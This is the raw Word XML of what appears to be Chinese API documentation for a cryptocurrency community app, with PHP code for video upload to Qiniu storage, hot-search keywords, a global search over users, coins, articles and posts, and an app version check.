    <w:p w14:paraId="10148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7F42A1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3A42B6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2C54E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507F0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357E48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8B889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6A6F4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49756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36F94B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14D5B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65759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C0265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err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8AD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92BC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39E8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891E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9B1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gt; $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4B9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review' =&gt; _imgUrl() . $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B87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JSON_UNESCAPED_SLASHES);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA35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0D94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qiniu_url . $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8769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D81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1768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8197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37862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上传图片不得为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66F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5C47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E3F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460B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2D9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429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index/video_upload </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E7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上传视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F9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12D9D3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99A3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File} video   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B705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5F0E49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video   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>视频</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422BE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preview </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>预览视频</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47C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上传失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F896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8982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deo_uploads()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37686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3B3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file('video')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E7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5A3543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487E5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3309F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1FDD4C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07C28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D281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peline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B4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db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244DF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5D32A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key = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A878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fops . '|saveas/' . $savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D487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nurl = config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F138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licy = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44C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Ops' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADD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Pipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5534F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NotifyUrl' =&gt; $wenurl . '/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C2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4C7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token = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB69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video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFF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0A7C5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5F53BD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uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A937D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774C5C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4782E9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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450A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469D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8FE2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CFB91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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A025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gt; $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E9A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view' =&gt; _imgUrl() . $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABFC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JSON_UNESCAPED_SLASHES);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7A3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73F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3303E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DD0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上传视频不得为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FEF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06D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22C7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582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31C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index/hotsearchkw </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>热搜关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01013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热搜关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C4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727A45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热搜关键词，多个关键词使用英文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CEA6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暂无热搜词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD50B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255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otsearchkw(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022F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w=config()['appConfig']['guanjianci'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E63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kw?['ret'=&gt;$kw]:['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暂无热搜词</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAA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51A4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287C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index/search </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全局搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D432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全局搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65737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197FF1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C69E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66EB99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keyword       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>搜索关键字（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AB9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搜索结果数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F0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coins          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D93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members         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80F4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circles         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4424E6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platform        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE69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articles        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFD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circle_articles </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21585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54D9D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1EF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earch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74139B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529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 = input('param.keyword', '', 'strip_tags,trim');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC00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keyword == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D70F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D67AA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搜索关键字不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D104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4012F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88DB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9663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s'] = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266E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password', true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB79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nickname', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3E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user', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8A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mobile', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A362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1AC99B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members']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E6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members'] as $key =&gt; $member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7AD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s'][$key]['img'] = $member['img'] ? _imgUrl().$member['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9872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713B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F1B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ins'] = Db::name('coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCE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urrency', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12721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fullname', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD81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fullname_zh', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C51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introduction_zh', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EAF2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follow_num', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164C5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1FC8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coins']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2B9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ote='USDT';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA261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 = array_column($data['coins'], 'currency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F5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_merge = function ($base) use ($quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC99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base/$quote";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF57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0B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array_map($symbol_merge, $arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27B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exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710B5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_query=Db::name('ticker')-&gt;field('batch_no')-&gt;order('ticker_timestamp desc')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3268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symbol'] = ['in', $symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE7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batch_no'] = $pre_query['batch_no'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDE7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s=Db::name('ticker')-&gt;order('ticker_timestamp desc')-&gt;where($ticker_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42389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icon=function($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11118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icon']= '/public/coin/icon/' . strtolower($coin['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B114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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70D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EF4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ins']=array_map($attach_icon, $data['coins']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539545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ticker=function($coin) use ($tickers, $quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A46B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coin['currency'] . '/' .$quote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB22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array_search($symbol, array_column($tickers, 'symbol'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74696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alse===$ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39C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symbol'=&gt;$symbol, 'last_price'=&gt;0, 'change'=&gt;0, 'percentage'=&gt;0, 'base_volume'=&gt;0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E65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AEA3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tickers[$ticker];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255197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207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ins']=array_map($attach_ticker, $data['coins']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAE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239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s'] = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669D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title', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1D8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content', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616718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4B2FF5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circles']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E52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circles'] as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37754A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s'][$key]['img'] = $circle['img'] ? _imgUrl().$circle['img'] : '/public/style/index/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A76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36D1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0D2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latform'] = Db::name('platform')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6FE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name', 'like', '%' . $keyword. '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B1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7C15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_replace=str_replace(' ','%',$keyword);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF07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 = Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46C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like', '%' . $keyword_replace . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14512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tags', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D787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keywords', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F770D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description', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254EB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57211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articles']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6A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articles'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB2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image'] = $article['image'] ? _imgUrl().$article['image'] : '/public/style/index/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC6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s'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAD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article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C0A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image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D869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image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1265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D47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B6D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username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544D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img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A2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2084A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uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC54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6764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article['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B20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763DE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username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE415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img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E2F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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54143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uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEB7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AB16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article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D62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article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F9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8191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author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45547F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article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA8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F3F7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13C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E8AFC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zan'] = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FF3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aid', $article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4217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2894BE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6D5EA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3141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s'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4A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uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADEFA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4739D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1EC75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6BFE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0FC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6E0B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 = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B390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like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C66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tags', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA04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keywords', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC38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description', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD99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56F57A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circle_articles']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F7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circle_articles'] as $key =&gt; $circle_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F91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image'] = $circle_article['image'] ? _imgUrl().$circle_article['image'] : '/public/style/index/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EF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images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470CFF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circle_article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5D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image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D68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image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F30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781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0D8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username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D454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img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565FA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34421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circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6625E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693B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circle_article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7A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470943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username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F5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img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5013E5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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26452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circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450AC5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9516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article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D78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circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125FF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9CFB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author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E77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circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7301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90AE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2E1B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DDF09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zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088C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circle_article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21F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member_id', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161C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0FB1F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903AA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s'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB93E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circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B08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13F229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C30D9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0263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B567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58A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195297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7A9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575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index/check_version_update </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有版本更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755F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检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有版本更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948CD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790027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603B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local_version      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本号（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F009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61B93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has_update      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有新版本可供更新：</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19A0F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latest_version     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE39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atest_version.version          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED38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atest_version.url_for_android  Android APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EB2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atest_version.url_for_ios      iOS APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C9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latest_version.create_time     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本发布时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67325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10F53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6C6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heck_version_update()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3150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F1F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cal_version = input('param.local_version', '', 'trim');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB24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test_version = Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3896CD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d', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4EC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574A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w:t>
      </w:r>
